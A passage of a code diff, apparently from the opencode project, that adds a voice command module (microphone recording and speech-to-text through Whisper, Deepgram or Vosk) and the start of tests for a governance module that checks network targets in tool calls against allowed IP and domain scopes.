+    customAliases.push(alias)
+  }
+
+  /**
+   * Add multiple custom aliases
+   */
+  export function addAliases(aliases: VoiceTypes.CommandAlias[]): void {
+    customAliases.push(...aliases)
+  }
+
+  /**
+   * Clear custom aliases
+   */
+  export function clearCustomAliases(): void {
+    customAliases = []
+  }
+
+  /**
+   * Get all available aliases
+   */
+  export function getAliases(): VoiceTypes.CommandAlias[] {
+    return [...DEFAULT_ALIASES, ...customAliases]
+  }
+
+  /**
+   * Get help text for voice commands
+   */
+  export function getHelp(): string {
+    const lines = ["Available voice commands:", ""]
+
+    const categories: Record<string, VoiceTypes.CommandAlias[]> = {}
+    for (const alias of DEFAULT_ALIASES) {
+      const category = alias.command.split(" ")[0]
+      if (!categories[category]) {
+        categories[category] = []
+      }
+      categories[category].push(alias)
+    }
+
+    for (const [category, aliases] of Object.entries(categories)) {
+      lines.push(`## ${category.toUpperCase()}`)
+      for (const alias of aliases) {
+        lines.push(`  "${alias.phrases[0]}" → ${alias.command}`)
+      }
+      lines.push("")
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/voice/index.ts b/packages/opencode/src/voice/index.ts
new file mode 100644
index 00000000000..1234407c420
--- /dev/null
+++ b/packages/opencode/src/voice/index.ts
@@ -0,0 +1,12 @@
+/**
+ * @fileoverview Voice Input Module
+ *
+ * Provides voice command support for hands-free operation.
+ * Supports multiple speech-to-text providers.
+ */
+
+export * from "./types"
+export * from "./recorder"
+export * from "./transcriber"
+export * from "./commands"
+export { VoiceInput } from "./voice-input"
diff --git a/packages/opencode/src/voice/recorder.ts b/packages/opencode/src/voice/recorder.ts
new file mode 100644
index 00000000000..72d48b9c87d
--- /dev/null
+++ b/packages/opencode/src/voice/recorder.ts
@@ -0,0 +1,235 @@
+/**
+ * @fileoverview Audio Recorder
+ *
+ * Cross-platform audio recording using system microphone.
+ */
+
+import { spawn, type ChildProcess } from "child_process"
+import { promises as fs } from "fs"
+import * as path from "path"
+import * as os from "os"
+import { Log } from "../util/log"
+import { VoiceTypes } from "./types"
+
+const log = Log.create({ name: "voice-recorder" })
+
+export namespace AudioRecorder {
+  let recordingProcess: ChildProcess | null = null
+  let isRecording = false
+
+  /**
+   * Check if recording tools are available
+   */
+  export async function checkAvailability(): Promise<{
+    available: boolean
+    tool: string | null
+    message: string
+  }> {
+    const tools = [
+      { name: "sox", args: ["--version"], platforms: ["linux", "darwin"] },
+      { name: "arecord", args: ["--version"], platforms: ["linux"] },
+      { name: "ffmpeg", args: ["-version"], platforms: ["linux", "darwin", "win32"] },
+    ]
+
+    for (const tool of tools) {
+      if (!tool.platforms.includes(process.platform)) continue
+
+      try {
+        const result = await new Promise<boolean>((resolve) => {
+          const proc = spawn(tool.name, tool.args, { stdio: "pipe" })
+          proc.on("error", () => resolve(false))
+          proc.on("close", (code) => resolve(code === 0))
+        })
+
+        if (result) {
+          return {
+            available: true,
+            tool: tool.name,
+            message: `Using ${tool.name} for audio recording`,
+          }
+        }
+      } catch {
+        continue
+      }
+    }
+
+    return {
+      available: false,
+      tool: null,
+      message: "No audio recording tool found. Install sox, arecord, or ffmpeg.",
+    }
+  }
+
+  /**
+   * Get the recording command for the current platform
+   */
+  function getRecordCommand(
+    outputPath: string,
+    config: VoiceTypes.VoiceConfig
+  ): { cmd: string; args: string[] } {
+    const platform = process.platform
+
+    if (platform === "darwin") {
+      // macOS - use sox with coreaudio
+      return {
+        cmd: "sox",
+        args: [
+          "-d",  // Default input device
+          "-r", String(config.sampleRate),
+          "-c", "1",  // Mono
+          "-b", "16", // 16-bit
+          outputPath,
+        ],
+      }
+    } else if (platform === "linux") {
+      // Linux - try sox first, fall back to arecord
+      return {
+        cmd: "sox",
+        args: [
+          "-d",
+          "-r", String(config.sampleRate),
+          "-c", "1",
+          "-b", "16",
+          outputPath,
+        ],
+      }
+    } else if (platform === "win32") {
+      // Windows - use ffmpeg with dshow
+      return {
+        cmd: "ffmpeg",
+        args: [
+          "-f", "dshow",
+          "-i", "audio=Microphone",
+          "-ar", String(config.sampleRate),
+          "-ac", "1",
+          "-y",
+          outputPath,
+        ],
+      }
+    }
+
+    throw new Error(`Unsupported platform: ${platform}`)
+  }
+
+  /**
+   * Start recording audio
+   */
+  export async function startRecording(
+    config: VoiceTypes.VoiceConfig = VoiceTypes.VoiceConfig.parse({})
+  ): Promise<string> {
+    if (isRecording) {
+      throw new Error("Already recording")
+    }
+
+    const availability = await checkAvailability()
+    if (!availability.available) {
+      throw new Error(availability.message)
+    }
+
+    // Create temp file for recording
+    const tempDir = os.tmpdir()
+    const timestamp = Date.now()
+    const outputPath = path.join(tempDir, `voice_${timestamp}.wav`)
+
+    const { cmd, args } = getRecordCommand(outputPath, config)
+
+    log.info("Starting recording", { cmd, outputPath })
+
+    return new Promise((resolve, reject) => {
+      recordingProcess = spawn(cmd, args, {
+        stdio: "pipe",
+      })
+
+      isRecording = true
+
+      recordingProcess.on("error", (err) => {
+        isRecording = false
+        recordingProcess = null
+        reject(new Error(`Recording failed: ${err.message}`))
+      })
+
+      // Set up auto-stop after max duration
+      const timeout = setTimeout(() => {
+        if (isRecording) {
+          stopRecording().then(() => resolve(outputPath)).catch(reject)
+        }
+      }, config.maxDuration)
+
+      recordingProcess.on("close", () => {
+        clearTimeout(timeout)
+        isRecording = false
+        recordingProcess = null
+        resolve(outputPath)
+      })
+    })
+  }
+
+  /**
+   * Stop recording audio
+   */
+  export async function stopRecording(): Promise<void> {
+    if (!isRecording || !recordingProcess) {
+      return
+    }
+
+    log.info("Stopping recording")
+
+    return new Promise((resolve) => {
+      if (recordingProcess) {
+        recordingProcess.on("close", () => {
+          isRecording = false
+          recordingProcess = null
+          resolve()
+        })
+
+        // Send SIGINT to gracefully stop recording
+        recordingProcess.kill("SIGINT")
+
+        // Force kill after 2 seconds if not stopped
+        setTimeout(() => {
+          if (recordingProcess) {
+            recordingProcess.kill("SIGKILL")
+          }
+        }, 2000)
+      } else {
+        resolve()
+      }
+    })
+  }
+
+  /**
+   * Record for a specific duration
+   */
+  export async function recordDuration(
+    durationMs: number,
+    config: VoiceTypes.VoiceConfig = VoiceTypes.VoiceConfig.parse({})
+  ): Promise<string> {
+    const outputPath = await startRecording({
+      ...config,
+      maxDuration: durationMs,
+    })
+
+    await new Promise((resolve) => setTimeout(resolve, durationMs))
+    await stopRecording()
+
+    return outputPath
+  }
+
+  /**
+   * Check if currently recording
+   */
+  export function getStatus(): VoiceTypes.Status {
+    return isRecording ? "listening" : "idle"
+  }
+
+  /**
+   * Clean up temporary audio files
+   */
+  export async function cleanup(filePath: string): Promise<void> {
+    try {
+      await fs.unlink(filePath)
+    } catch {
+      // Ignore cleanup errors
+    }
+  }
+}
diff --git a/packages/opencode/src/voice/transcriber.ts b/packages/opencode/src/voice/transcriber.ts
new file mode 100644
index 00000000000..7bc78aac8c0
--- /dev/null
+++ b/packages/opencode/src/voice/transcriber.ts
@@ -0,0 +1,302 @@
+/**
+ * @fileoverview Speech-to-Text Transcriber
+ *
+ * Supports multiple STT providers including OpenAI Whisper.
+ */
+
+import { spawn } from "child_process"
+import { promises as fs } from "fs"
+import { Log } from "../util/log"
+import { VoiceTypes } from "./types"
+
+const log = Log.create({ name: "voice-transcriber" })
+
+export namespace Transcriber {
+  /**
+   * Transcribe audio file using configured provider
+   */
+  export async function transcribe(
+    audioPath: string,
+    config: VoiceTypes.VoiceConfig = VoiceTypes.VoiceConfig.parse({})
+  ): Promise<VoiceTypes.TranscriptionResult> {
+    const startTime = Date.now()
+
+    switch (config.provider) {
+      case "whisper":
+        return transcribeWhisperAPI(audioPath, config)
+      case "whisper-local":
+        return transcribeWhisperLocal(audioPath, config)
+      case "deepgram":
+        return transcribeDeepgram(audioPath, config)
+      case "vosk":
+        return transcribeVosk(audioPath, config)
+      default:
+        throw new Error(`Unsupported provider: ${config.provider}`)
+    }
+  }
+
+  /**
+   * Transcribe using OpenAI Whisper API
+   */
+  async function transcribeWhisperAPI(
+    audioPath: string,
+    config: VoiceTypes.VoiceConfig
+  ): Promise<VoiceTypes.TranscriptionResult> {
+    const startTime = Date.now()
+
+    const apiKey = config.apiKey || process.env.OPENAI_API_KEY
+    if (!apiKey) {
+      throw new Error("OpenAI API key required for Whisper API. Set OPENAI_API_KEY or provide apiKey in config.")
+    }
+
+    const audioData = await fs.readFile(audioPath)
+    const uint8Array = new Uint8Array(audioData)
+    const blob = new Blob([uint8Array], { type: "audio/wav" })
+
+    const formData = new FormData()
+    formData.append("file", blob, "audio.wav")
+    formData.append("model", "whisper-1")
+    formData.append("language", config.language.split("-")[0]) // "en-US" -> "en"
+    formData.append("response_format", "verbose_json")
+
+    log.info("Sending audio to Whisper API")
+
+    const response = await fetch("https://api.openai.com/v1/audio/transcriptions", {
+      method: "POST",
+      headers: {
+        "Authorization": `Bearer ${apiKey}`,
+      },
+      body: formData,
+    })
+
+    if (!response.ok) {
+      const error = await response.text()
+      throw new Error(`Whisper API error: ${error}`)
+    }
+
+    const result = await response.json() as {
+      text: string
+      language: string
+      duration: number
+      words?: Array<{ word: string; start: number; end: number }>
+    }
+
+    return {
+      text: result.text.trim(),
+      language: result.language,
+      duration: Date.now() - startTime,
+      words: result.words?.map((w) => ({
+        word: w.word,
+        start: w.start * 1000,
+        end: w.end * 1000,
+      })),
+    }
+  }
+
+  /**
+   * Transcribe using local Whisper model
+   */
+  async function transcribeWhisperLocal(
+    audioPath: string,
+    config: VoiceTypes.VoiceConfig
+  ): Promise<VoiceTypes.TranscriptionResult> {
+    const startTime = Date.now()
+
+    // Check if whisper CLI is available
+    const whisperAvailable = await checkCommand("whisper")
+    if (!whisperAvailable) {
+      throw new Error("Local Whisper not found. Install with: pip install openai-whisper")
+    }
+
+    const modelSize = config.modelPath || "base"
+
+    return new Promise((resolve, reject) => {
+      const args = [
+        audioPath,
+        "--model", modelSize,
+        "--language", config.language.split("-")[0],
+        "--output_format", "json",
+        "--output_dir", "/tmp",
+      ]
+
+      const proc = spawn("whisper", args, { stdio: "pipe" })
+      let stdout = ""
+      let stderr = ""
+
+      proc.stdout?.on("data", (data) => { stdout += data.toString() })
+      proc.stderr?.on("data", (data) => { stderr += data.toString() })
+
+      proc.on("error", (err) => reject(err))
+      proc.on("close", async (code) => {
+        if (code !== 0) {
+          reject(new Error(`Whisper failed: ${stderr}`))
+          return
+        }
+
+        try {
+          // Read the JSON output
+          const jsonPath = audioPath.replace(/\.[^.]+$/, ".json")
+          const jsonContent = await fs.readFile(jsonPath, "utf-8")
+          const result = JSON.parse(jsonContent)
+
+          resolve({
+            text: result.text?.trim() || "",
+            language: result.language,
+            duration: Date.now() - startTime,
+          })
+        } catch (err) {
+          // Fallback: parse from stderr/stdout
+          const textMatch = stdout.match(/\] (.+)$/m)
+          resolve({
+            text: textMatch?.[1]?.trim() || "",
+            duration: Date.now() - startTime,
+          })
+        }
+      })
+    })
+  }
+
+  /**
+   * Transcribe using Deepgram API
+   */
+  async function transcribeDeepgram(
+    audioPath: string,
+    config: VoiceTypes.VoiceConfig
+  ): Promise<VoiceTypes.TranscriptionResult> {
+    const startTime = Date.now()
+
+    const apiKey = config.apiKey || process.env.DEEPGRAM_API_KEY
+    if (!apiKey) {
+      throw new Error("Deepgram API key required. Set DEEPGRAM_API_KEY or provide apiKey in config.")
+    }
+
+    const audioData = await fs.readFile(audioPath)
+    const uint8Array = new Uint8Array(audioData)
+
+    const response = await fetch(
+      `https://api.deepgram.com/v1/listen?language=${config.language}&punctuate=true`,
+      {
+        method: "POST",
+        headers: {
+          "Authorization": `Token ${apiKey}`,
+          "Content-Type": "audio/wav",
+        },
+        body: uint8Array,
+      }
+    )
+
+    if (!response.ok) {
+      const error = await response.text()
+      throw new Error(`Deepgram API error: ${error}`)
+    }
+
+    const result = await response.json() as {
+      results: {
+        channels: Array<{
+          alternatives: Array<{
+            transcript: string
+            confidence: number
+            words: Array<{ word: string; start: number; end: number; confidence: number }>
+          }>
+        }>
+      }
+    }
+
+    const alternative = result.results?.channels?.[0]?.alternatives?.[0]
+
+    return {
+      text: alternative?.transcript?.trim() || "",
+      confidence: alternative?.confidence,
+      duration: Date.now() - startTime,
+      words: alternative?.words?.map((w) => ({
+        word: w.word,
+        start: w.start * 1000,
+        end: w.end * 1000,
+        confidence: w.confidence,
+      })),
+    }
+  }
+
+  /**
+   * Transcribe using Vosk (offline)
+   */
+  async function transcribeVosk(
+    audioPath: string,
+    config: VoiceTypes.VoiceConfig
+  ): Promise<VoiceTypes.TranscriptionResult> {
+    const startTime = Date.now()
+
+    // Check if vosk-transcriber is available
+    const voskAvailable = await checkCommand("vosk-transcriber")
+    if (!voskAvailable) {
+      throw new Error("Vosk not found. Install with: pip install vosk")
+    }
+
+    return new Promise((resolve, reject) => {
+      const args = ["-i", audioPath]
+      if (config.modelPath) {
+        args.push("-m", config.modelPath)
+      }
+
+      const proc = spawn("vosk-transcriber", args, { stdio: "pipe" })
+      let stdout = ""
+      let stderr = ""
+
+      proc.stdout?.on("data", (data) => { stdout += data.toString() })
+      proc.stderr?.on("data", (data) => { stderr += data.toString() })
+
+      proc.on("error", (err) => reject(err))
+      proc.on("close", (code) => {
+        if (code !== 0) {
+          reject(new Error(`Vosk failed: ${stderr}`))
+          return
+        }
+
+        resolve({
+          text: stdout.trim(),
+          duration: Date.now() - startTime,
+        })
+      })
+    })
+  }
+
+  /**
+   * Check if a command is available
+   */
+  async function checkCommand(cmd: string): Promise<boolean> {
+    return new Promise((resolve) => {
+      const proc = spawn(cmd, ["--help"], { stdio: "pipe" })
+      proc.on("error", () => resolve(false))
+      proc.on("close", (code) => resolve(code === 0))
+    })
+  }
+
+  /**
+   * Get available providers
+   */
+  export async function getAvailableProviders(): Promise<VoiceTypes.Provider[]> {
+    const available: VoiceTypes.Provider[] = []
+
+    // Whisper API is always available if API key is set
+    if (process.env.OPENAI_API_KEY) {
+      available.push("whisper")
+    }
+
+    // Check local whisper
+    if (await checkCommand("whisper")) {
+      available.push("whisper-local")
+    }
+
+    // Deepgram is available if API key is set
+    if (process.env.DEEPGRAM_API_KEY) {
+      available.push("deepgram")
+    }
+
+    // Check vosk
+    if (await checkCommand("vosk-transcriber")) {
+      available.push("vosk")
+    }
+
+    return available
+  }
+}
diff --git a/packages/opencode/src/voice/types.ts b/packages/opencode/src/voice/types.ts
new file mode 100644
index 00000000000..09dce199611
--- /dev/null
+++ b/packages/opencode/src/voice/types.ts
@@ -0,0 +1,110 @@
+/**
+ * @fileoverview Voice Input Types
+ *
+ * Type definitions for voice input and speech recognition.
+ */
+
+import z from "zod"
+
+export namespace VoiceTypes {
+  /** Supported speech-to-text providers */
+  export const Provider = z.enum([
+    "whisper",      // OpenAI Whisper API
+    "whisper-local", // Local Whisper model
+    "deepgram",     // Deepgram API
+    "google",       // Google Cloud Speech
+    "azure",        // Azure Speech Services
+    "vosk",         // Vosk (offline)
+  ])
+  export type Provider = z.infer<typeof Provider>
+
+  /** Voice input status */
+  export const Status = z.enum([
+    "idle",
+    "listening",
+    "processing",
+    "error",
+  ])
+  export type Status = z.infer<typeof Status>
+
+  /** Audio format */
+  export const AudioFormat = z.enum([
+    "wav",
+    "mp3",
+    "webm",
+    "ogg",
+    "flac",
+  ])
+  export type AudioFormat = z.infer<typeof AudioFormat>
+
+  /** Voice configuration */
+  export const VoiceConfig = z.object({
+    /** Speech-to-text provider */
+    provider: Provider.default("whisper"),
+    /** API key for cloud providers */
+    apiKey: z.string().optional(),
+    /** Language code (e.g., "en-US") */
+    language: z.string().default("en-US"),
+    /** Sample rate in Hz */
+    sampleRate: z.number().default(16000),
+    /** Enable continuous listening */
+    continuous: z.boolean().default(false),
+    /** Silence threshold for auto-stop (ms) */
+    silenceThreshold: z.number().default(2000),
+    /** Max recording duration (ms) */
+    maxDuration: z.number().default(30000),
+    /** Wake word (optional) */
+    wakeWord: z.string().optional(),
+    /** Audio format */
+    format: AudioFormat.default("wav"),
+    /** Local model path (for whisper-local/vosk) */
+    modelPath: z.string().optional(),
+  })
+  export type VoiceConfig = z.infer<typeof VoiceConfig>
+
+  /** Transcription result */
+  export const TranscriptionResult = z.object({
+    /** Transcribed text */
+    text: z.string(),
+    /** Confidence score (0-1) */
+    confidence: z.number().min(0).max(1).optional(),
+    /** Detected language */
+    language: z.string().optional(),
+    /** Processing duration (ms) */
+    duration: z.number(),
+    /** Word-level timestamps */
+    words: z.array(z.object({
+      word: z.string(),
+      start: z.number(),
+      end: z.number(),
+      confidence: z.number().optional(),
+    })).optional(),
+  })
+  export type TranscriptionResult = z.infer<typeof TranscriptionResult>
+
+  /** Voice command */
+  export const VoiceCommand = z.object({
+    /** Raw transcribed text */
+    raw: z.string(),
+    /** Parsed command */
+    command: z.string(),
+    /** Command arguments */
+    args: z.record(z.string(), z.string()),
+    /** Confidence score */
+    confidence: z.number().optional(),
+    /** Timestamp */
+    timestamp: z.number(),
+  })
+  export type VoiceCommand = z.infer<typeof VoiceCommand>
+
+  /** Command mapping for voice shortcuts */
+  export const CommandAlias = z.object({
+    /** Voice phrases that trigger this command */
+    phrases: z.array(z.string()),
+    /** Actual command to execute */
+    command: z.string(),
+    /** Command description */
+    description: z.string().optional(),
+  })
+  export type CommandAlias = z.infer<typeof CommandAlias>
+}
diff --git a/packages/opencode/src/voice/voice-input.ts b/packages/opencode/src/voice/voice-input.ts
new file mode 100644
index 00000000000..1816f34893f
--- /dev/null
+++ b/packages/opencode/src/voice/voice-input.ts
@@ -0,0 +1,249 @@
+/**
+ * @fileoverview Voice Input Controller
+ *
+ * Main interface for voice-controlled operation.
+ */
+
+import { Log } from "../util/log"
+import { VoiceTypes } from "./types"
+import { AudioRecorder } from "./recorder"
+import { Transcriber } from "./transcriber"
+import { VoiceCommands } from "./commands"
+
+const log = Log.create({ name: "voice-input" })
+
+export namespace VoiceInput {
+  let config: VoiceTypes.VoiceConfig = VoiceTypes.VoiceConfig.parse({})
+  let status: VoiceTypes.Status = "idle"
+  let commandCallback: ((cmd: VoiceTypes.VoiceCommand) => void) | null = null
+  let continuousMode = false
+  let stopRequested = false
+
+  /**
+   * Initialize voice input with configuration
+   */
+  export async function initialize(
+    options: Partial<VoiceTypes.VoiceConfig> = {}
+  ): Promise<{ success: boolean; message: string }> {
+    config = VoiceTypes.VoiceConfig.parse(options)
+
+    // Check audio recording availability
+    const recorderStatus = await AudioRecorder.checkAvailability()
+    if (!recorderStatus.available) {
+      return {
+        success: false,
+        message: recorderStatus.message,
+      }
+    }
+
+    // Check transcription provider availability
+    const providers = await Transcriber.getAvailableProviders()
+    if (providers.length === 0) {
+      return {
+        success: false,
+        message: "No speech-to-text provider available. Set OPENAI_API_KEY for Whisper API or install local tools.",
+      }
+    }
+
+    // Use first available provider if configured one isn't available
+    if (!providers.includes(config.provider)) {
+      config.provider = providers[0]
+      log.info(`Using ${config.provider} provider (configured provider not available)`)
+    }
+
+    log.info("Voice input initialized", {
+      provider: config.provider,
+      language: config.language,
+    })
+
+    return {
+      success: true,
+      message: `Voice input ready. Using ${config.provider} for speech recognition.`,
+    }
+  }
+
+  /**
+   * Listen for a single voice command
+   */
+  export async function listen(): Promise<VoiceTypes.VoiceCommand | null> {
+    if (status === "listening") {
+      throw new Error("Already listening")
+    }
+
+    status = "listening"
+    log.info("Listening for voice command...")
+
+    try {
+      // Record audio
+      const audioPath = await AudioRecorder.startRecording(config)
+
+      // Wait for user to stop (or auto-stop after silence/max duration)
+      await waitForRecordingComplete()
+
+      status = "processing"
+      log.info("Processing audio...")
+
+      // Transcribe
+      const transcription = await Transcriber.transcribe(audioPath, config)
+
+      if (!transcription.text) {
+        log.info("No speech detected")
+        status = "idle"
+        await AudioRecorder.cleanup(audioPath)
+        return null
+      }
+
+      log.info("Transcription result", { text: transcription.text })
+
+      // Parse command
+      const command = VoiceCommands.parse(transcription.text)
+
+      // Cleanup
+      await AudioRecorder.cleanup(audioPath)
+
+      status = "idle"
+      return command
+    } catch (err) {
+      status = "error"
+      log.error("Voice input error", { error: (err as Error).message })
+      throw err
+    }
+  }
+
+  /**
+   * Wait for recording to complete
+   */
+  async function waitForRecordingComplete(): Promise<void> {
+    return new Promise((resolve) => {
+      const checkInterval = setInterval(() => {
+        if (AudioRecorder.getStatus() === "idle") {
+          clearInterval(checkInterval)
+          resolve()
+        }
+      }, 100)
+    })
+  }
+
+  /**
+   * Start continuous listening mode
+   */
+  export async function startContinuous(
+    onCommand: (cmd: VoiceTypes.VoiceCommand) => void
+  ): Promise<void> {
+    if (continuousMode) {
+      throw new Error("Already in continuous mode")
+    }
+
+    continuousMode = true
+    stopRequested = false
+    commandCallback = onCommand
+
+    log.info("Starting continuous listening mode")
+
+    while (continuousMode && !stopRequested) {
+      try {
+        const command = await listen()
+        if (command && commandCallback) {
+          // Check for stop command
+          if (command.command === "exit" || command.command === "stop listening") {
+            break
+          }
+          commandCallback(command)
+        }
+      } catch (err) {
+        log.error("Error in continuous mode", { error: (err as Error).message })
+        // Brief pause before retrying
+        await new Promise((resolve) => setTimeout(resolve, 1000))
+      }
+    }
+
+    continuousMode = false
+    commandCallback = null
+    log.info("Continuous listening stopped")
+  }
+
+  /**
+   * Stop continuous listening mode
+   */
+  export function stopContinuous(): void {
+    stopRequested = true
+    continuousMode = false
+    AudioRecorder.stopRecording()
+  }
+
+  /**
+   * Stop current recording
+   */
+  export async function stop(): Promise<void> {
+    await AudioRecorder.stopRecording()
+    status = "idle"
+  }
+
+  /**
+   * Get current status
+   */
+  export function getStatus(): VoiceTypes.Status {
+    return status
+  }
+
+  /**
+   * Check if voice input is available
+   */
+  export async function isAvailable(): Promise<boolean> {
+    const recorder = await AudioRecorder.checkAvailability()
+    const providers = await Transcriber.getAvailableProviders()
+    return recorder.available && providers.length > 0
+  }
+
+  /**
+   * Get voice input configuration
+   */
+  export function getConfig(): VoiceTypes.VoiceConfig {
+    return { ...config }
+  }
+
+  /**
+   * Update configuration
+   */
+  export function setConfig(options: Partial<VoiceTypes.VoiceConfig>): void {
+    config = VoiceTypes.VoiceConfig.parse({ ...config, ...options })
+  }
+
+  /**
+   * Get available voice commands help
+   */
+  export function getHelp(): string {
+    return VoiceCommands.getHelp()
+  }
+
+  /**
+   * Quick voice command - record, transcribe, and return command
+   */
+  export async function quickCommand(
+    durationMs: number = 5000
+  ): Promise<VoiceTypes.VoiceCommand | null> {
+    status = "listening"
+    log.info(`Recording for ${durationMs}ms...`)
+
+    try {
+      const audioPath = await AudioRecorder.recordDuration(durationMs, config)
+
+      status = "processing"
+      const transcription = await Transcriber.transcribe(audioPath, config)
+
+      await AudioRecorder.cleanup(audioPath)
+
+      if (!transcription.text) {
+        status = "idle"
+        return null
+      }
+
+      const command = VoiceCommands.parse(transcription.text)
+      status = "idle"
+      return command
+    } catch (err) {
+      status = "error"
+      throw err
+    }
+  }
+}
diff --git a/packages/opencode/test/governance/governance.test.ts b/packages/opencode/test/governance/governance.test.ts
new file mode 100644
index 00000000000..2eeb508af89
--- /dev/null
+++ b/packages/opencode/test/governance/governance.test.ts
@@ -0,0 +1,451 @@
+import { test, expect, describe, beforeEach } from "bun:test"
+import { GovernanceMatcher } from "../../src/governance/matcher"
+import { GovernanceScope } from "../../src/governance/scope"
+import { GovernancePolicy } from "../../src/governance/policy"
+import { GovernanceAudit } from "../../src/governance/audit"
+import { GovernanceTypes } from "../../src/governance/types"
+
+describe("GovernanceMatcher", () => {
+  describe("classifyTarget", () => {
+    test("classifies IPv4 addresses", () => {
+      const target = GovernanceMatcher.classifyTarget("192.168.1.1")
+      expect(target.type).toBe("ip")
+      expect(target.normalized).toBe("192.168.1.1")
+    })
+
+    test("classifies CIDR notation", () => {
+      const target = GovernanceMatcher.classifyTarget("10.0.0.0/8")
+      expect(target.type).toBe("cidr")
+      expect(target.normalized).toBe("10.0.0.0/8")
+    })
+
+    test("classifies domain names", () => {
+      const target = GovernanceMatcher.classifyTarget("example.com")
+      expect(target.type).toBe("domain")
+      expect(target.normalized).toBe("example.com")
+    })
+
+    test("classifies URLs and extracts hostname", () => {
+      const target = GovernanceMatcher.classifyTarget("https://API.Example.COM/v1/users")
+      expect(target.type).toBe("url")
+      expect(target.normalized).toBe("api.example.com")
+    })
+
+    test("returns unknown for unrecognized strings", () => {
+      const target = GovernanceMatcher.classifyTarget("not-a-target")
+      expect(target.type).toBe("unknown")
+    })
+
+    test("validates IP octets are 0-255", () => {
+      const invalid = GovernanceMatcher.classifyTarget("999.999.999.999")
+      expect(invalid.type).toBe("unknown")
+    })
+  })
+
+  describe("extractTargets", () => {
+    test("extracts URL from bash curl command", () => {
+      const targets = GovernanceMatcher.extractTargets("bash", {
+        command: "curl https://api.example.com/data"
+      })
+      expect(targets.length).toBe(1)
+      expect(targets[0].type).toBe("url")
+      expect(targets[0].normalized).toBe("api.example.com")
+    })
+
+    test("extracts IP from bash ping command", () => {
+      const targets = GovernanceMatcher.extractTargets("bash", {
+        command: "ping 192.168.1.1"
+      })
+      expect(targets.length).toBe(1)
+      expect(targets[0].type).toBe("ip")
+      expect(targets[0].normalized).toBe("192.168.1.1")
+    })
+
+    test("extracts host from SSH command", () => {
+      const targets = GovernanceMatcher.extractTargets("bash", {
+        command: "ssh admin@server.company.com"
+      })
+      expect(targets.length).toBeGreaterThanOrEqual(1)
+      expect(targets.some(t => t.normalized === "server.company.com")).toBe(true)
+    })
+
+    test("extracts URL from webfetch tool", () => {
+      const targets = GovernanceMatcher.extractTargets("webfetch", {
+        url: "https://api.github.com/repos"
+      })
+      expect(targets.length).toBe(1)
+      expect(targets[0].normalized).toBe("api.github.com")
+    })
+
+    test("returns empty for websearch", () => {
+      const targets = GovernanceMatcher.extractTargets("websearch", {
+        query: "how to code"
+      })
+      expect(targets.length).toBe(0)
+    })
+
+    test("deduplicates targets by normalized value", () => {
+      const targets = GovernanceMatcher.extractTargets("bash", {
+        command: "curl https://api.example.com && curl https://API.EXAMPLE.COM/other"
+      })
+      expect(targets.length).toBe(1)
+    })
+
+    test("extracts multiple different targets", () => {
+      const targets = GovernanceMatcher.extractTargets("bash", {
+        command: "curl https://api.example.com && ping 10.0.0.1"
+      })
+      expect(targets.length).toBe(2)
+    })
+  })
+
+  describe("ipInCidr", () => {
+    test("matches IP in /8 network", () => {
+      expect(GovernanceMatcher.ipInCidr("10.1.2.3", "10.0.0.0/8")).toBe(true)
+      expect(GovernanceMatcher.ipInCidr("10.255.255.255", "10.0.0.0/8")).toBe(true)
+      expect(GovernanceMatcher.ipInCidr("11.0.0.0", "10.0.0.0/8")).toBe(false)
+    })
+
+    test("matches IP in /24 network", () => {
+      expect(GovernanceMatcher.ipInCidr("192.168.1.100", "192.168.1.0/24")).toBe(true)
+      expect(GovernanceMatcher.ipInCidr("192.168.1.255", "192.168.1.0/24")).toBe(true)
+      expect(GovernanceMatcher.ipInCidr("192.168.2.1", "192.168.1.0/24")).toBe(false)
+    })
+
+    test("matches IP in /32 (single host)", () => {
+      expect(GovernanceMatcher.ipInCidr("192.168.1.1", "192.168.1.1/32")).toBe(true)
+      expect(GovernanceMatcher.ipInCidr("192.168.1.2", "192.168.1.1/32")).toBe(false)
+    })
+
+    test("matches IP in /0 (all IPs)", () => {
+      expect(GovernanceMatcher.ipInCidr("1.2.3.4", "0.0.0.0/0")).toBe(true)
+      expect(GovernanceMatcher.ipInCidr("255.255.255.255", "0.0.0.0/0")).toBe(true)
+    })
+  })
+
+  describe("matchTarget", () => {
+    test("matches IP against CIDR pattern", () => {
+      const target: GovernanceTypes.Target = {
+        raw: "10.0.0.5",
+        type: "ip",
+        normalized: "10.0.0.5"
+      }
+      expect(GovernanceMatcher.matchTarget(target, "10.0.0.0/8")).toBe(true)
+      expect(GovernanceMatcher.matchTarget(target, "192.168.0.0/16")).toBe(false)
+    })
+
+    test("matches domain against wildcard pattern", () => {
+      const target: GovernanceTypes.Target = {
+        raw: "api.example.com",
+        type: "domain",
+        normalized: "api.example.com"
+      }
+      expect(GovernanceMatcher.matchTarget(target, "*.example.com")).toBe(true)
+      expect(GovernanceMatcher.matchTarget(target, "*.other.com")).toBe(false)
+    })
+
+    test("matches exact domain", () => {
+      const target: GovernanceTypes.Target = {
+        raw: "example.com",
+        type: "domain",
+        normalized: "example.com"
+      }
+      expect(GovernanceMatcher.matchTarget(target, "example.com")).toBe(true)
+      expect(GovernanceMatcher.matchTarget(target, "*.example.com")).toBe(false)
+    })
+  })
+})
+
+describe("GovernanceScope", () => {
+  test("allows when no scope configured", () => {
+    const targets: GovernanceTypes.Target[] = [
+      { raw: "10.0.0.1", type: "ip", normalized: "10.0.0.1" }
+    ]
+    const result = GovernanceScope.check(targets, undefined)
+    expect(result.allowed).toBe(true)
+  })
+
+  test("allows when no targets extracted", () => {
+    const result = GovernanceScope.check([], { ip: { allow: ["10.0.0.0/8"] } })
+    expect(result.allowed).toBe(true)
+  })
+
+  test("allows IP in allowed CIDR range", () => {
+    const targets: GovernanceTypes.Target[] = [
+      { raw: "10.0.0.5", type: "ip", normalized: "10.0.0.5" }
+    ]
+    const result = GovernanceScope.check(targets, {
+      ip: { allow: ["10.0.0.0/8"] }
+    })
+    expect(result.allowed).toBe(true)
+  })
+
+  test("denies IP not in allowed range", () => {
+    const targets: GovernanceTypes.Target[] = [
+      { raw: "8.8.8.8", type: "ip", normalized: "8.8.8.8" }
+    ]
+    const result = GovernanceScope.check(targets, {
+      ip: { allow: ["10.0.0.0/8"] }
+    })
+    expect(result.allowed).toBe(false)
+    expect(result.reason).toContain("not in allowed scope")
+  })
+
+  test("denies IP matching deny list even if in allow list", () => {
+    const targets: GovernanceTypes.Target[] = [
+      { raw: "10.0.0.1", type: "ip", normalized: "10.0.0.1" }
+    ]
+    const result = GovernanceScope.check(targets, {
+      ip: {
